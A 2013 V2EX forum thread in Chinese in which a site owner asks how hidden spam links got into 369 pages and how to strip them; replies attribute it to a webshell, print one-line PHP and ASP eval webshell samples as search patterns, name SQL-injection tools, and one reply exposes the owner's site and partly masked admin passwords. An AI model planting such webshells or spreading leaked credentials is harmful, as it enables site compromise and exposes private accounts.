网站下的所有html、htm文件被写入一堆内容,可以通过正则判断把这些黑内容一次替换掉吗?

2013-04-21 19:27:34 +08:00
 asher
用grep查了下,受影响的文件有369个。
可以通过find或者sed把这些黑内容给清除掉吗?
黑内容如下:
<table style="margin-top: 20px;" align="center" width="968" border="0" cellpadding="0" cellspacing="0">
<tbody><tr>
<td width="450"><style type="text/css">
#weblink1{width:100px;height:20px;line-height:20px;main-left:0px;main-bottom:10px;overflow:hidden;position:absolute;top:600px;left:0px;}
#weblink1 a{display:block;font-size:12px;line-height:20px;text-decoration:none;font-family:Arial;cursor: default;}
</style>
<div id="weblink1"><a href="/">.</a><a href="/">.</a>
…… (此处为一行又一行的链接)
</div>

提问一:想请问下这些内容是通过什么方式写入的?
提问二:能通过正则判断把这些黑内容一次替换掉吗?
提问三:是因为账号被泄露,还是因为程序有漏洞呢?

谢谢.
4430 次点击
所在节点    问与答
15 条回复
laoyu
2013-04-21 19:38:40 +08:00
第一:基本可以判断是用webshell批量挂的黑链
第二:能
第三:不一定帐号被泄露但肯定程序有漏洞,最好把账户密码改掉,然后查找把漏洞补上,如果不是什么大站80%是注入引起的,你就说下你用的什么程序,再分析!
laoyu
2013-04-21 19:44:26 +08:00
补充一下
如果是开源或者公开的程序,说一下是什么程序,我帮你分析下漏洞原因。
光清除黑链也没什么用,可能webshell还在,或者一句好木马还在。

先查木马吧,全站查找类似如下:

如果是PHP: <?php @eval($_POST['pass']);?>
如果是ASP: <%eval request("pass")%>
fityme
2013-04-21 19:55:18 +08:00
@laoyu 我记得之前用wordpress的时候也被挂了好多
laoyu
2013-04-21 19:58:54 +08:00
这个还需要具体分析 wp被黑几率很小,除非你服务器上还有其他的站旁注过去的

我现在怀疑LZ就是这么个问题 而且怀疑是他的ECSHOP程序,booko?这个站?
laoyu
2013-04-21 20:06:38 +08:00
@asher
我瞎猜一下LZ的网站,http://www.ks-book.com 这个,和上面的那个,还有个就不贴了。
用的ECSHOP 这个漏洞就太多了,两个管理员
用户名asher
密码:lin_80***6
用户名:lingc
密码:asher****51
asher
2013-04-21 20:11:26 +08:00
@laoyu 汗,能给个联系方式吗?另我能申请@livid删除5楼这个回复吗?
并希望@laoyu 可以不见怪。。
laoyu
2013-04-21 20:13:31 +08:00
@asher 你承认就好了,即使你什么都没说,还是能查到你的一些信息,另外ECSHOP漏洞太多了
5L的内容也不算敏感。你给我个联系方式我帮助你解决下就好了。
asher
2013-04-21 20:16:27 +08:00
lin.lion # gmail.com 谢谢。
workaholic
2013-04-21 20:55:43 +08:00
有工具能解决,批量删除黑链,其实就是遍历目录和正则文件内容
ljbha007
2013-04-21 21:50:00 +08:00
@laoyu 你是怎么猜到的啊??这么厉害
Tiny
2013-04-21 23:26:00 +08:00
这个猜的好牛逼。。
iloveyou
2013-04-22 08:03:26 +08:00
这就是传说中的实时黑吗?
taogogo
2013-04-22 10:25:34 +08:00
只要有注入,工具一扫就可以拿到了,win下有明小子旁注、啊D注入工具、HDSI等,linux、mac下有sqlmap都挺好用的。

建议小白天天上: www.hackdig.com 学习黑客知识。。。
sobigfish
2013-04-22 10:35:25 +08:00
天啊,ShopEx真心恐怖啊

http://www.wooyun.org/corps/ShopEx
why
2013-04-22 12:32:55 +08:00
搜索 #weblink1 a{display:block;font-size:12px;
再看lz的会员主页

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/66514

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX